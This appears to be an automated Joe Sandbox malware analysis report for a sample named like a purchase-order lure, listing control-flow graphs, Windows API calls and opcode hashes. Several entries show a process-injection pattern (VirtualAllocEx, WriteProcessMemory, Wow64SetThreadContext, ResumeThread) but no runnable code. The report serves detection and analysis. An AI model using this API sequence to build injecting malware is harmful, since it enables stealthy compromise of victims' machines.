                                        control_flow_graph 1722 11bada8-11badb7 1723 11badb9-11badc6 call 11ba100 1722->1723 1724 11bade3-11bade7 1722->1724 1731 11badc8 1723->1731 1732 11baddc 1723->1732 1725 11badfb-11bae3c 1724->1725 1726 11bade9-11badf3 1724->1726 1733 11bae49-11bae57 1725->1733 1734 11bae3e-11bae46 1725->1734 1726->1725 1780 11badce call 11bb031 1731->1780 1781 11badce call 11bb040 1731->1781 1732->1724 1735 11bae7b-11bae7d 1733->1735 1736 11bae59-11bae5e 1733->1736 1734->1733 1739 11bae80-11bae87 1735->1739 1740 11bae69 1736->1740 1741 11bae60-11bae67 call 11ba10c 1736->1741 1737 11badd4-11badd6 1737->1732 1738 11baf18-11baf2f 1737->1738 1755 11baf31-11baf90 1738->1755 1743 11bae89-11bae91 1739->1743 1744 11bae94-11bae9b 1739->1744 1742 11bae6b-11bae79 1740->1742 1741->1742 1742->1739 1743->1744 1746 11baea8-11baeaa call 11ba11c 1744->1746 1747 11bae9d-11baea5 1744->1747 1751 11baeaf-11baeb1 1746->1751 1747->1746 1753 11baebe-11baec3 1751->1753 1754 11baeb3-11baebb 1751->1754 1756 11baee1-11baeee 1753->1756 1757 11baec5-11baecc 1753->1757 1754->1753 1773 11baf92-11bafd8 1755->1773 1762 11baf11-11baf17 1756->1762 1763 11baef0-11baf0e 1756->1763 1757->1756 1758 11baece-11baede call 11ba12c call 11ba13c 1757->1758 1758->1756 1763->1762 1775 11bafda-11bafdd 1773->1775 1776 11bafe0-11bb00b GetModuleHandleW 1773->1776 1775->1776 1777 11bb00d-11bb013 1776->1777 1778 11bb014-11bb028 1776->1778 1777->1778 1780->1737 1781->1737
                                        APIs
                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 011BAFFE
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2014332432.00000000011B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011B0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_11b0000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID: HandleModule
                                        • String ID:
                                        • API String ID: 4139908857-0
                                        • Opcode ID: 475f3ad71a6e485ca70ec9dc9b7b80fefcbe7736d681a7b95f461af48c645458
                                        • Instruction ID: acf9f6b0cbd9c32c66b3679bea42ebc9620119c170f52bca5d265f02b026627b
                                        • Opcode Fuzzy Hash: 475f3ad71a6e485ca70ec9dc9b7b80fefcbe7736d681a7b95f461af48c645458
                                        • Instruction Fuzzy Hash: 47714970A00B058FD768DF2AE49179ABBF5FF48304F00892DD586D7A50DB35E845CB91
                                        Function 011B44E0 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1782 11b44e0-11b59d9 CreateActCtxA 1785 11b59db-11b59e1 1782->1785 1786 11b59e2-11b5a3c 1782->1786 1785->1786 1793 11b5a4b-11b5a4f 1786->1793 1794 11b5a3e-11b5a41 1786->1794 1795 11b5a51-11b5a5d 1793->1795 1796 11b5a60 1793->1796 1794->1793 1795->1796 1798 11b5a61 1796->1798 1798->1798
                                        APIs
                                        • CreateActCtxA.KERNEL32(?), ref: 011B59C9
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2014332432.00000000011B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011B0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_11b0000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID: Create
                                        • String ID:
                                        • API String ID: 2289755597-0
                                        • Opcode ID: 220b8997eb5038eb50692402dd6fbc0f9b5779f2183ab0800169b78d6fbd75c3
                                        • Instruction ID: 2c743d551fab32c5a7aaa1d2aae7457142fcbc0021961f15ba31bbaf53671130
                                        • Opcode Fuzzy Hash: 220b8997eb5038eb50692402dd6fbc0f9b5779f2183ab0800169b78d6fbd75c3
                                        • Instruction Fuzzy Hash: 0141F5B1C0071DCBDB28CFA9C8847DDBBB6BF49304F20806AD408AB251D775594ACF91
                                        Function 011B590C Relevance: 1.6, APIs: 1, Instructions: 95COMMON
                                        Download Yara Rule
                                        APIs
                                        • CreateActCtxA.KERNEL32(?), ref: 011B59C9
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2014332432.00000000011B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011B0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_11b0000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID: Create
                                        • String ID:
                                        • API String ID: 2289755597-0
                                        • Opcode ID: efcdd31f8a4e48961321efd9240a793fe173ebd36801c0cc5f03b16203dd80a4
                                        • Instruction ID: 33c435ba9ca79c39142796059f24c3e6c4d5a507e83e469389b49dd0ee40205c
                                        • Opcode Fuzzy Hash: efcdd31f8a4e48961321efd9240a793fe173ebd36801c0cc5f03b16203dd80a4
                                        • Instruction Fuzzy Hash: 3041E2B1C00719CBDB28CFA9C985BDDBBB6BF49304F20806AD408AB255DB75594ACF90
                                        Function 050B4050 Relevance: 1.6, APIs: 1, Instructions: 93COMMON
                                        Download Yara Rule
                                        APIs
                                        • CallWindowProcW.USER32(?,?,?,?,?), ref: 050B4111
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017165313.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_50b0000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID: CallProcWindow
                                        • String ID:
                                        • API String ID: 2714655100-0
                                        • Opcode ID: 308251750ee93e31e9833c32ac9813b199765664f525572c6c46f9ec09f44d23
                                        • Instruction ID: f2c8f1c15dc175c93095d05e4e32110df5feff0eaadb21c58c9609b45787d8fa
                                        • Opcode Fuzzy Hash: 308251750ee93e31e9833c32ac9813b199765664f525572c6c46f9ec09f44d23
                                        • Instruction Fuzzy Hash: 2E4129B49003098FDB14CF89C888AAEBBF6FB89314F24C458D519A7321D374A941CFA0
                                        Function 04AF30A0 Relevance: 1.6, APIs: 1, Instructions: 80windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • PostMessageW.USER32(?,00000010,00000000,?), ref: 04AF556D
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2016568014.0000000004AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4af0000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID: MessagePost
                                        • String ID:
                                        • API String ID: 410705778-0
                                        • Opcode ID: cc57bd0e737a7b2901cccc43419931c9044e37ac5f012be291101fcdfedd1c2f
                                        • Instruction ID: 5b2eb4e51fe3416a422156d547e80e82076d63b1d1887dcc2212a7e724d3a493
                                        • Opcode Fuzzy Hash: cc57bd0e737a7b2901cccc43419931c9044e37ac5f012be291101fcdfedd1c2f
                                        • Instruction Fuzzy Hash: 5021E1B6C043889FCB11CF99C885BDEBFF4EF19310F14845AD544A7212D274A505CBA1
                                        Function 04AF1B70 Relevance: 1.6, APIs: 1, Instructions: 79memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 04AF1BE6
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2016568014.0000000004AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4af0000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID: AllocVirtual
                                        • String ID:
                                        • API String ID: 4275171209-0
                                        • Opcode ID: cdbbe3373bbe7771a5bcad8f3e6765c4210f9a96782633865b1dd5da75a5f2f7
                                        • Instruction ID: 4bcddfb60dcfcfbd2791a2e67149785b3eba075dd3f23a12f5ed968790624ffe
                                        • Opcode Fuzzy Hash: cdbbe3373bbe7771a5bcad8f3e6765c4210f9a96782633865b1dd5da75a5f2f7
                                        • Instruction Fuzzy Hash: E4314675D00249CFCB10DFA9D885AEEFBF1FF88324F148419E519AB210D735A941CB90
                                        Function 04AF15B0 Relevance: 1.6, APIs: 1, Instructions: 71threadCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2016568014.0000000004AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4af0000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID: ResumeThread
                                        • String ID:
                                        • API String ID: 947044025-0
                                        • Opcode ID: dc28fa22ea49e4a9225df59653a37fb2807bfe004c467e8342900f7b9f845ff3
                                        • Instruction ID: 43eac8d975853f2d532995e99e00d062ef79b27f1e544b4b81860ed42d89ef1c
                                        • Opcode Fuzzy Hash: dc28fa22ea49e4a9225df59653a37fb2807bfe004c467e8342900f7b9f845ff3
                                        • Instruction Fuzzy Hash: F12144B1D00248CFCB10DFA9C8456EEFBF5EF88310F24846AE519A7250DB39AA45CF91
                                        Function 04AF1C38 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                        Download Yara Rule
                                        APIs
                                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 04AF1CC8
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2016568014.0000000004AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4af0000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID: MemoryProcessWrite
                                        • String ID:
                                        • API String ID: 3559483778-0
                                        • Opcode ID: d0204682dd9fa32b0ac195b03e5598cf726dc8811c71d2260de1e7ec68d43059
                                        • Instruction ID: 355ac5960710c71dcfeaa48f2217d969156b4a0eb729b967f327c5ec252056fc
                                        • Opcode Fuzzy Hash: d0204682dd9fa32b0ac195b03e5598cf726dc8811c71d2260de1e7ec68d43059
                                        • Instruction Fuzzy Hash: 112139B1900349DFCB10DFAAC985BEEBBF5FF48310F108429E919A7240D778A945DBA1
                                        Function 011BB790 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                        Download Yara Rule
                                        APIs
                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,011BD646,?,?,?,?,?), ref: 011BD707
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2014332432.00000000011B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011B0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_11b0000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID: DuplicateHandle
                                        • String ID:
                                        • API String ID: 3793708945-0
                                        • Opcode ID: 48f1665fe588f9a08a459d52513c03898f21894978765d084c47b715484a29b7
                                        • Instruction ID: 5e2990d785725571d89fc0539fbf8f292ea09d3b52013f2081e849c9b875e391
                                        • Opcode Fuzzy Hash: 48f1665fe588f9a08a459d52513c03898f21894978765d084c47b715484a29b7
                                        • Instruction Fuzzy Hash: 6E21E3B59002489FDB14CFAAD585AEEFBF9FB48314F14841AE918A3350D379A940CFA5
                                        Function 04AF1666 Relevance: 1.6, APIs: 1, Instructions: 64threadCOMMON
                                        Download Yara Rule
                                        APIs
                                        • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 04AF16E6
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2016568014.0000000004AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4af0000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID: ContextThreadWow64
                                        • String ID:
                                        • API String ID: 983334009-0
                                        • Opcode ID: 3637be4165e55b2302680fb1ef963aa0790fe705eb9509fb33c1d2a0536a8217
                                        • Instruction ID: e258fafd785366a8bd382879fde645def3410bfa4519876d2f6767b8e381c212
                                        • Opcode Fuzzy Hash: 3637be4165e55b2302680fb1ef963aa0790fe705eb9509fb33c1d2a0536a8217
                                        • Instruction Fuzzy Hash: 242138B1D002098FDB10DFAAC485BEEFBF4EF48310F148429E519A7240DB78A945CFA1
                                        Function 011BD678 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                        Download Yara Rule
                                        APIs
                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,011BD646,?,?,?,?,?), ref: 011BD707
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2014332432.00000000011B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011B0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_11b0000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID: DuplicateHandle
                                        • String ID:
                                        • API String ID: 3793708945-0
                                        • Opcode ID: 06e6b7da9dcb1b2532efeddc0eb61501c93018b28b5e2042022afbc50d2246ae
                                        • Instruction ID: f4a32cc763b0759d418e85a847b50fe9ac7b35d427b94f2ace1051ae998df57a
                                        • Opcode Fuzzy Hash: 06e6b7da9dcb1b2532efeddc0eb61501c93018b28b5e2042022afbc50d2246ae
                                        • Instruction Fuzzy Hash: 7121E0B5D002499FDB10CFAAD985ADEBBF5FB48314F14801AE918B3350D378A954CFA0
                                        Function 04AF1D28 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                        Download Yara Rule
                                        APIs
                                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 04AF1DA8
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2016568014.0000000004AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4af0000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID: MemoryProcessRead
                                        • String ID:
                                        • API String ID: 1726664587-0
                                        • Opcode ID: fe62221166dd3cf2e9e79f7c7b63387de5581dddf979cbd15013015e5f6c2bc0
                                        • Instruction ID: 7760bcff6cb19f2a3e7beaa0f4d2b40b5b679b228c20e6378aa904a1ebcae8fa
                                        • Opcode Fuzzy Hash: fe62221166dd3cf2e9e79f7c7b63387de5581dddf979cbd15013015e5f6c2bc0
                                        • Instruction Fuzzy Hash: 742139B1C003499FDB10DFAAC985AEEFBF5FF48310F108429E519A7240C779A941DBA1
                                        Function 04AF1668 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                        Download Yara Rule
                                        APIs
                                        • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 04AF16E6
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2016568014.0000000004AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4af0000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID: ContextThreadWow64
                                        • String ID:
                                        • API String ID: 983334009-0
                                        • Opcode ID: fa56d265ec068407e1d8b50b024d7c0b196c630736abb1678aee5b83db8eed53
                                        • Instruction ID: 5edc326cccf315709a4c1594162cc50ac08a33bb165a8bbdce49e91fcf300660
                                        • Opcode Fuzzy Hash: fa56d265ec068407e1d8b50b024d7c0b196c630736abb1678aee5b83db8eed53
                                        • Instruction Fuzzy Hash: 102138B1D002098FDB10DFAAC485BEEFBF4EF48310F148429E519A7240DB78A945CFA5
                                        Function 011BA168 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,011BB079,00000800,00000000,00000000), ref: 011BB28A
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2014332432.00000000011B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011B0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_11b0000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID: LibraryLoad
                                        • String ID:
                                        • API String ID: 1029625771-0
                                        • Opcode ID: 4b6383ee3ccd1ee7dadfca3cbc2b4361890d4f419988be7c886a90a6b2dea3d6
                                        • Instruction ID: 05a376b64572a0628e8b1574891feda197a115aeb0918a0cd9aaa014a1f55c01
                                        • Opcode Fuzzy Hash: 4b6383ee3ccd1ee7dadfca3cbc2b4361890d4f419988be7c886a90a6b2dea3d6
                                        • Instruction Fuzzy Hash: 911126B6C043498FDB14CF9AD584ADEFBF4EB48710F10846AE519A7610C379A544CFA5
                                        Function 011BB219 Relevance: 1.6, APIs: 1, Instructions: 54libraryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,011BB079,00000800,00000000,00000000), ref: 011BB28A
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2014332432.00000000011B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011B0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_11b0000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID: LibraryLoad
                                        • String ID:
                                        • API String ID: 1029625771-0
                                        • Opcode ID: 441fd17f3e6f63151070697498df40878a0e32adf1f9b5889ef6047b75026ecf
                                        • Instruction ID: 56d5dc57653f803b82fb32489d2f379aa3e0cddd8f4f9ee0fd647f71aa6380d2
                                        • Opcode Fuzzy Hash: 441fd17f3e6f63151070697498df40878a0e32adf1f9b5889ef6047b75026ecf
                                        • Instruction Fuzzy Hash: 3A1112B68043498FDB14CFAAC984ADEFBF4EB48710F14846AE519A7600C379A545CFA5
                                        Function 04AF1B78 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 04AF1BE6
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2016568014.0000000004AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4af0000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID: AllocVirtual
                                        • String ID:
                                        • API String ID: 4275171209-0
                                        • Opcode ID: 3077e5b3a60f5bd6fbbb90d7b4f7458e1f78cc5ccfaa6e679a312bae9b4dd886
                                        • Instruction ID: 03127d3203e857ef80483802165ad7fac8abf6f1a95aebc6401bc3551454ff39
                                        • Opcode Fuzzy Hash: 3077e5b3a60f5bd6fbbb90d7b4f7458e1f78cc5ccfaa6e679a312bae9b4dd886
                                        • Instruction Fuzzy Hash: 20112675800249DFCB10DFAAC845AEEFFF5EF48310F148419E519A7250CB79A940CBA1
                                        Function 04AF15B8 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2016568014.0000000004AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4af0000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID: ResumeThread
                                        • String ID:
                                        • API String ID: 947044025-0
                                        • Opcode ID: eae571a109f773586dcb182ef8dd59471a955eb6cae0b0b88f1f3b4053cf55d3
                                        • Instruction ID: da60693c560425c31ee1efdef808d1ee14a5c234cffc36bd8c270774bc46fca3
                                        • Opcode Fuzzy Hash: eae571a109f773586dcb182ef8dd59471a955eb6cae0b0b88f1f3b4053cf55d3
                                        • Instruction Fuzzy Hash: C31136B1D002498FDB20DFAAC8457EEFBF5EF88724F248419D519A7240CB79A944CBA5
                                        Function 011BAF98 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 011BAFFE
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2014332432.00000000011B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011B0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_11b0000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID: HandleModule
                                        • String ID:
                                        • API String ID: 4139908857-0
                                        • Opcode ID: 63b5db1771032f8d980c1b9a7bf038f1897fa6e8139c3bb5ddbd6c6ea04b3113
                                        • Instruction ID: 6c60bfb843926ce97883f0032f84829ebed7508f1ccbddfc8faf22593c87d738
                                        • Opcode Fuzzy Hash: 63b5db1771032f8d980c1b9a7bf038f1897fa6e8139c3bb5ddbd6c6ea04b3113
                                        • Instruction Fuzzy Hash: 371110B6C002498FDB14CF9AC544ADEFBF4EF88314F10841AD528A7610D379A545CFA5
                                        Function 04AF5508 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • PostMessageW.USER32(?,00000010,00000000,?), ref: 04AF556D
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2016568014.0000000004AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4af0000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID: MessagePost
                                        • String ID:
                                        • API String ID: 410705778-0
                                        • Opcode ID: 9a51cbdb6205716f89f2a1cb35ef02a68f71a8f9c6fb2b907e1c7fca236fb199
                                        • Instruction ID: 54e62dd7965078e6d566ea8e3a3b3aa3a901de9d017ca06c341149671516da4a
                                        • Opcode Fuzzy Hash: 9a51cbdb6205716f89f2a1cb35ef02a68f71a8f9c6fb2b907e1c7fca236fb199
                                        • Instruction Fuzzy Hash: 631103B58002499FDB10DF99D985BDEFFF9FB48320F108419E958A7200C379A544CFA1
                                        Function 04AF3090 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • PostMessageW.USER32(?,00000010,00000000,?), ref: 04AF556D
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2016568014.0000000004AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4af0000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID: MessagePost
                                        • String ID:
                                        • API String ID: 410705778-0
                                        • Opcode ID: 557a2029d01590e8745d1da3e99172b3d727598a3b5930aae1bb7613cd1b7047
                                        • Instruction ID: 950a1bb9ace3170b7d9ee5d1818bbbb608fb62d45513c985551c123398674cf8
                                        • Opcode Fuzzy Hash: 557a2029d01590e8745d1da3e99172b3d727598a3b5930aae1bb7613cd1b7047
                                        • Instruction Fuzzy Hash: B111F2B5C003499FDB10DF9AD985BDEBBF8EB48310F108419E519A7201D379A944CFA5
                                        Function 050F0AF8 Relevance: 1.4, Strings: 1, Instructions: 132COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017233756.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_50f0000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: Haq
                                        • API String ID: 0-725504367
                                        • Opcode ID: c856913733e961a234f0369397d704cd1075f3d8a98728d50ac7b4398822d1a1
                                        • Instruction ID: 0c140d90c3f457fa39100137d08240cc44f06287a69c8e54a7466b901d7538ec
                                        • Opcode Fuzzy Hash: c856913733e961a234f0369397d704cd1075f3d8a98728d50ac7b4398822d1a1
                                        • Instruction Fuzzy Hash: DE41E4317041109FC7559F28E468BAE77EAFF84704F1881AAE90A9BB52CB35AC42D7D1
                                        Function 050F6918 Relevance: 1.4, Strings: 1, Instructions: 103COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017233756.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_50f0000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: (aq
                                        • API String ID: 0-600464949
                                        • Opcode ID: c2e9290c518999d180aed1cdb3bef6abe395e7dc3194851faa2f4a196a40b6ab
                                        • Instruction ID: 03c5b71ff459f328c0fc89b36b473355a0fe06ea9fb977280366dfe9aabc17d8
                                        • Opcode Fuzzy Hash: c2e9290c518999d180aed1cdb3bef6abe395e7dc3194851faa2f4a196a40b6ab
                                        • Instruction Fuzzy Hash: 22210A317042445FDB08ABB9A8256BE7FEAEFC6710F14846DE585C7642DD30DC038751
                                        Function 050F0A98 Relevance: 1.3, Strings: 1, Instructions: 78COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017233756.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_50f0000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: (aq
                                        • API String ID: 0-600464949
                                        • Opcode ID: 079679883bf58bb82a56b48d6b6246b574c7ff96ef89c66479223d4b6a81f784
                                        • Instruction ID: 503f8f68fdda89ef383128f0d7f2b1e3529597192bd12969b0247da5deb70987
                                        • Opcode Fuzzy Hash: 079679883bf58bb82a56b48d6b6246b574c7ff96ef89c66479223d4b6a81f784
                                        • Instruction Fuzzy Hash: C1210672A0E611AFC7299F19E42866EFBA0FF81704F18409ED94697E83CA34B851C7D1
                                        Function 050F64F8 Relevance: 1.3, Strings: 1, Instructions: 62COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017233756.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_50f0000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: (aq
                                        • API String ID: 0-600464949
                                        • Opcode ID: 7c8ea4b6cf863e95cc9da505b5d5d58cda55477982178a94e8b701b1ebf45dc4
                                        • Instruction ID: e0e4eeb3a63d1e0e2f75a3c57209cc463a650c5503dda30ae5947cec421aff54
                                        • Opcode Fuzzy Hash: 7c8ea4b6cf863e95cc9da505b5d5d58cda55477982178a94e8b701b1ebf45dc4
                                        • Instruction Fuzzy Hash: D8112671B082556FCB099B79A8195BF3FFADBC6750B1448AEE506C7382DD25CC0283A1
                                        Function 050FF424 Relevance: 1.3, Strings: 1, Instructions: 23COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017233756.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_50f0000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: ;k[
                                        • API String ID: 0-2043752727
                                        • Opcode ID: a9663e3a82e7a7421e6d627823513b063abdec9871457d984e0ef92d78b52e4d
                                        • Instruction ID: af1339c14fb486cfc59d094c18df7fe5a0327a627436d201690bb7331ef1b71f
                                        • Opcode Fuzzy Hash: a9663e3a82e7a7421e6d627823513b063abdec9871457d984e0ef92d78b52e4d
                                        • Instruction Fuzzy Hash: 07F0A0306207009FCB08EF38E586C5E3BBAEF94300B508929E0068F6A4DF71ED098F90
                                        Function 050F3F28 Relevance: .2, Instructions: 219COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017233756.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_50f0000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 01fac225a87097567c71f6fecb9f2790a67cc405a49aaed4cb0481dc01269cbb
                                        • Instruction ID: 97ae102e1479a5a41940f17969e685087435e44a917f7967f12b9213a51a6954
                                        • Opcode Fuzzy Hash: 01fac225a87097567c71f6fecb9f2790a67cc405a49aaed4cb0481dc01269cbb
                                        • Instruction Fuzzy Hash: 4581B4347106108FCB58EF28E5999AD7BF6FF89605B1541A9EA06CB376DB71EC01CB80
                                        Function 050F2D30 Relevance: .2, Instructions: 168COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017233756.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_50f0000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5e221b60d0ae8587160020e5fd963fb6d61c68567b3ad477a6fdf9aa08aeb1d1
                                        • Instruction ID: 225f642f175336f85fe373a067f89052e1a95e553ef17a04c89a8fb812b50758
                                        • Opcode Fuzzy Hash: 5e221b60d0ae8587160020e5fd963fb6d61c68567b3ad477a6fdf9aa08aeb1d1
                                        • Instruction Fuzzy Hash: 5471AF38A01209EFCB54DFA9E884DAEBBB6FF49714B114098F901AB761D731EC81CB50
                                        Function 050F4734 Relevance: .2, Instructions: 155COMMON
                                        Download Yara Rule
